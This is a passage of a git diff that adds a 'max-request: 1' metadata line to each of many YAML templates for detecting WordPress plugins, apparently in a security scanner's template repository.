.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml 